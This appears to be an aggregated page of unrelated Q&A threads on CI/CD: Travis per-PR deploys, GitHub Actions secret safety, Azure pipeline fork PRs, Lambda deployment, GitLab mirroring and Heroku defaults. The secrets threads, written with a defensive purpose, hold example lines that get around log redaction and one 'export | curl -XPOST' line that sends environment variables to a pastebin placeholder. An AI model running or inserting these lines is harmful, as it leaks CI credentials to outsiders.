Having some trouble finding info on this, not sure exactly how I'd search for it so figured I'd just throw a question up here...
GitHub pull requests on Travis are pretty much ready to go out of the box, but...I'm interested in deploying each PR to an independent URL (staging.example.com/pull-request-01 or something like that..). It's possible that this is super simple and outlined in Travis' docs, but I'm having trouble finding it.
Does anyone have their CI setup like this?
Some of the documentation from Travis CI that I could find that will likely be useful in sorting out a full answer
Pull Requests -- Pull Requests and Security Restrictions
Environment Variables -- Defining Encrypted Variables in travis.yml
Deployment -- Conditional Releases with on
Deployment -- Heroku
TLD
Encrypted variables will only be available to Pull Requests issued from the same repository. Testing for environment variables and Git interaction that triggered Travis CI is required...
script:
- if [ "$TRAVIS_PULL_REQUEST" == true ]; then bash ./travis/run_on_pull_requests; fi
Once signed into the Travis CI command-line interface, encrypting enviroment variables looks somewhat like...
travis encrypt -r owner/project --pro SOMEVAR="secretvalue"
... then copy output from above (secure: ".... encrypted data ....") into the project's _travis.yml file.
I didn't see anything for DigitalOcean, but there's not much stopping anyone from writing their own script for such things, and for S3 deployment looks like Travis CI has some ready-made magics for such things to read up on (third link above)...
deploy:
provider: s3
access_key_id: "YOUR AWS ACCESS KEY"
secret_access_key: "YOUR AWS SECRET KEY"
bucket: "S3 Bucket"
skip_cleanup: true
on:
branch: release
condition: $MY_ENV = super_awesome
Few more answers for your questions
Does anyone have their CI setup like this?
I do not... yet. But I've been exploring Travis CI documentation for sometime and may edit this answer in the future to include more references.
I'm interested in deploying each PR to an independent URL (staging.example.com/pull-request-01 or something like that..) It's possible that this is super simple and outlined in Travis' docs, but I'm having trouble finding it.
Aside from the previously suggested reading material, you'll likely want to do some custom stuff within a run_on_pull_requests script.
Easiest route I can think up at this time would be parsing the commit hash such that URLs look a bit like staging.example.com/pull-request-4d3adbe3f.
Hints on how to maybe construct such a string in a Bash script...
printf 'pull-request-%s' "$(git rev-parse --short HEAD)"
_url="staging.example.com/pull-request-$(git rev-parse --short HEAD)"
I suggest the commit hash route because then anyone with permissions to open Pull Requests (from the given repository), has a predictable route for building the URL on their end.
Consider letting us all know if ya get stuck or fully solve it.
Figured out a cool way to do this! Here is a pretty self explanatory Gist that can help someone trying to do this on an Ember project, it could also probably inform any other code stacks..
https://gist.github.com/ChristopherJohnson25/7350169203a2ecfa9193785bede52bd3
This is also possible with Heroku Review Apps and Gitlab Review Apps. If you're using Docker you could also use this tool, which I built.
Related
I don't know why Github secrets are really called secrets, because it can be printed out by any person working in organization with push access, i.e. they create branch use below trick to print secret and then delete the branch, and with snap of fingers any employee can take out secrets.
If there is optimal solution, kindly guide me to permanently secure my github action secrets.
steps:
- name: 'Checkout'
uses: actions/checkout#master
- name: 'Print secrets'
run: |
echo ${{ secrets.SOME_SECRET }} | sed 's/./& /g'
First off, GitHub has an article on Security hardening for actions, which contains some general recommendations.
In general, you want to distinguish between public and internal/private repositories.
Most of my following answer is on internal/private repositories, but if you're concerned about public repositories: Keep in mind that actions are not run on PRs from third parties until they are approved.
For internal/private repositories, you're going to have to trust your colleagues with some secrets. Going through the hassle of guarding all secrets to the extent that they can't be "extracted" by a colleagues is probably not worth the effort. And at that point, you probably also have to ask yourself what damage a malicious employee could do even without knowing these secrets (perhaps they have inside knowledge of your business, they work in IT so they might be able to put your services offline, etc). So you're going to have to trust them to some extent.
Some measures to limit the damage a malicious colleague could do:
Environment Secrets
You can create a secret for an environment and protect the environment.
For example, assume you want to prevent colleagues from taking your production secrets and deploy from their computers instead of going through GitHub actions.
You could create a job like the following:
jobs:
prod:
runs-on: ubuntu-latest
environment: production
steps:
- run: ./deploy.sh --keys ${{ secrets.PROD_SECRET }}
Steps:
Configure the secret PROD_SECRET as an environment secret for production
Create the environment production and setup protection rules
If you really want to be sure nobody does something you don't like, you can set yourself as a reviewer and then manually approve every deployment
Codeowners
You could use codeowners and protect the files in .github/workflows. more about codeowners
OIDC and reusable workflows
If you're deploying to some cloud environment, you should probably use OpenID Connect. That, combined with reusable workflows, can give you an additional layer of security: You can specify which workflow is allowed to deploy to production.
#rethab answer is great, I'll just add the answer I got from the Github Support after I contacted them for a similar issue.
Thank you for writing to GitHub Support.
Please note that it is not expected behavior that GitHub will redact every possible obfuscation of the secrets from the logs.
https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-secrets
To help prevent accidental disclosure, GitHub uses a mechanism that
attempts to redact any secrets that appear in run logs. This redaction
looks for exact matches of any configured secrets, as well as common
encodings of the values, such as Base64. However, because there are
multiple ways a secret value can be transformed, this redaction is not
guaranteed.
https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#exfiltrating-data-from-a-runner
To help prevent accidental secret disclosure, GitHub Actions
automatically redact secrets printed to the log, but this is not a
true security boundary because secrets can be intentionally sent to
the log. For example, obfuscated secrets can be exfiltrated using echo
${SOME_SECRET:0:4}; echo ${SOME_SECRET:4:200};
Notice that in this case, what is being printed in the logs is NOT the secret that is stored in the repository but an obfuscation of it. Additionally, any user with Write access will be able to access secrets without needing to print them in the logs. They can run arbitrary commands in the workflows to send the secrets over HTTP or even store the secrets as workflows artifacts and download the artifacts.
You can read more about security hardening for GitHub Actions below:
https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions
I have a public repo. Random GitHub users are free to create pull requests, and this is great.
My CI pipeline is described in a normal file in the repo called pipelines.yml (we use Azure pipelines).
Unfortunately this means that a random GitHub user is able to steal all my secret environment variables by creating a PR where they edit the pipelines.yml and add a bash script line with something like:
export | curl -XPOST 'http://pastebin-bla/xxxx'
Or run arbitrary code, in general. Right?
How can I verify that a malicious PR doesn't change at least some critical files?
How can I verify that a malicious PR doesn't change at least some critical files?
I am afraid we could not limit the PR doesn't change at least some critical files.
As workaround, we could turn off automatic fork builds and instead use pull request comments as a way to manually building these contributions, which give you an opportunity to review the code before triggering a build.
You could check the document Consider manually triggering fork builds for some more details.
I have a single repository that hosts my lambda functions on github. I would like to be able to deploy the new versions whenever new logic is pushed to master.
I did a lot of reasearch and found a few different approaches, but nothing really clear. Would like to know what others feel would be the best way to go about this, and maybe some detail (if possible) into how that pipeline is setup.
Thanks
Welcome to StackOverflow. You can improve your question by reading this page.
You can setup a CI/CD pipeline using CircleCI with its GitHub integration (which is an online Service, so you don't need to maintain anything, like a Jenkins server, for example)
Upon every commit to your repository, a CircleCI build will be triggered. Once the build process is over, you can declare sls deploy, sam deploy, use Terraform or even create a script to upload the .zip file from your GitHub repo to an S3 Bucket and then, within your script, invoke the create-function command. There's an example how to deploy Serverless applications using CircleCI along with the Serverless Framework here
Other options include TravisCI, AWS Code Deploy or even maintain your own CI/CD Server. The same logic applies to all of these tools though: commit -> build -> deploy (using one of the tools you've chosen).
EDIT: After #Matt's answer, it clicked that the OP never mentioned the Serverless Framework (I, somehow, thought he was already using it, so I pointed the OP to tutorials using the Serverless Framework already). I then decided to update my answer with a few other options for serverless deployment
I know that this isn't exactly what you asked for but I use Serverless Framework (https://serverless.com) for deployment and I love it. I don't do my deployments when I push to my repo. Instead I push to my repo after I've deployed. I like this flow because a deployment can fail due to so many things and pushing to GitHub is much less likely to fail. I this way, I prevent pushing code that failed to deploy to my master branch.
I don't know if you're familiar with the framework but it is super simple. The website describes the simple steps to creating and deploy a function like this.
1 # Step 1. Install serverless globally
2 $ npm install serverless -g
3
4 # Step 2. Create a serverless function
5 $ serverless create --template hello-world
6
7 # Step 3. deploy to cloud provider
8 $ serverless deploy
9
10 # Your function is deployed!
11 $ http://xyz.amazonaws.com/hello-world
There are also a number of plugins you can use to integrate easily with custom domains on APIGateway, prune older versions of lambda functions that might be filling up your limits, etc...
Overall, I've found it to be the easiest way to manage and deploy my lambdas. Hope it helps!
Given that you're using AWS Lambda, you may want to consider CodePipeline to automate your release process. [SAM(https://docs.aws.amazon.com/lambda/latest/dg/serverless_app.html) may also be interesting.
I too had the same problem. I wanted to manage 12 lambdas with 1 git repository. I solved it by introducing travis-ci. travis-ci saved the time and really useful in many ways. We can check the logs whenever we want and you can share the logs to anyone by sharing the URL. The sample documentation of all steps can be found here. You can go through it. 👍
My Google-fu is failing me for what seems obvious if I can only find the right manual.
I have a Gitlab server which was installed by our hosting provider
The Gitlab server has many projects.
For some of these projects, I want that Gitlab automatically pushes to a remote repository (in this case Github) every time there is a push from a local client to Gitlab.
Like this: client --> gitlab --> github
Any tags and branches should also be pushed.
AFAICT I have 3 options:
Configure the local client with two remotes, and push simultaneous to Gitlab and Github. I want to avoid this because developers.
Add a git post-receive hook in the repository on the Gitlab server. This would be most flexible (I have sufficient Linux experience to write shell scripts as git hooks) and I have found documentation on how to do this, but I want to avoid this too because then the hosting provider will need to give me shell access.
I use webhooks in Gitlab. I am unfamiliar with what the very basics of webhooks are, and I am unable to locate understandable documentation or even a simple step-by-step example. This is the documentation from Gitlab that I found and I do not understand it: http://demo.gitlab.com/help/web_hooks/web_hooks
I would appreciate good pointers, and I will summarize and document a solution when I find it.
EDIT
I'm using this Ruby code for a web hook:
class PewPewPew < Sinatra::Base
post '/pew' do
push = JSON.parse(request.body.read)
puts "I got some JSON: #{push.inspect}"
end
end
Next: find out how to tell the gitlab server that it has to push a repository. I am going back to the GitLab API.
EDIT
I think I have an idea. On the server where I run the webhook, I pull from GitLab and then I push to Github. I can even do some "magic" (running tests, building jars, deploying to Artifactory,...) before I push to GitHub. In fact it would be great if Jenkins were able to push to a remote repository after a succesful build, then I wouldn't need to write my own webhook, because I'm pretty sure Jenkins already provides a webhook for Gitlab, either native or via a plugin. But I don't know. Yet.
EDIT
I solved it in Jenkins.
You can set more than one git remote in an Jenkins job. I used Git Publisher as a Post-Build Action and it worked like a charm, exactly what I wanted.
would work of course.
is possible but dangerous because GitLab shell automatically symlinks hooks into repositories for you, and those are necessary for permission checks: https://github.com/gitlabhq/gitlab-shell/tree/823aba63e444afa2f45477819770fec3cb5f0159/hooks so I'd rather stay away from it.
Web hooks are not suitable directly: they make an HTTP request with fixed format on certain events, in your case push, not Git protocol requests.
Of course, you could write a server that consumes the hook, clones and pushes, but a service (single push and no deployment) or GitLab CI (already implements hook management) would be strictly better solutions.
services are a the best option if someone implements it: live in the source tree, would do a single push, and require no extra deployment overhead.
GitLab CI or othe CIs like Jenkins are the best option currently available. They are essentially already implemented server for the webhooks, which automatically clone for you: all you have to do then is to push from them.
The keywords you want to Google for are "gitlab mirror github". That has led me to: Gitlab repository mirroring for instance. There seems to be no perfect, easy solution today.
Also this has already been proposed at the feature request forum at: http://feedback.gitlab.com/forums/176466-general/suggestions/4614663-automatic-push-to-remote-mirror-repo-after-push-to Always check there ;) Go and upvote the request.
The key difficulty now is how to store the push credentials.
I solved it in Jenkins. You can set more than one git remote in an Jenkins job. I used Git Publisher as a Post-Build Action and it worked like a charm, exactly what I wanted.
I added "-publisher" jobs that run after "" is built successfully. I could have done it in one job, but I decided to split it up. The build jobs are triggered by a web hook in GitLab; the publisher jobs are using a #daily schedule from the BuildResultTrigger plugin.
I have more than one app/git remote at heroku and I would like to know if it is possible to configure a default application so that, whenever I forget to specify the app (--app), the toolbelt would use it.
You can set the heroku.remote key in your repo's Git config to the name of the default remote. For example, if your remote is called staging, you could do this:
$ git config heroku.remote staging
To see how this works, here is the relevant source.
For more, information about this, see Managing Multiple Environments for an App.
You could also go for:
heroku git:remote -a <name-of-the-app>
or if you tend to make a lot of mistakes in the configuration of wrong apps, you can use this library I made: https://github.com/kubek2k/heroshell
This is a Heroku wrapper shell that allows you to work in the context of a given Heroku application
You can set the HEROKU_APP environment variable.
Found this question while searching for it myself. The other answers refer to Heroku's old ruby-based CLI. The new JS CLI doesn't seem to support the same git-remote-reading feature. A quick search of the source code on GitHub found this.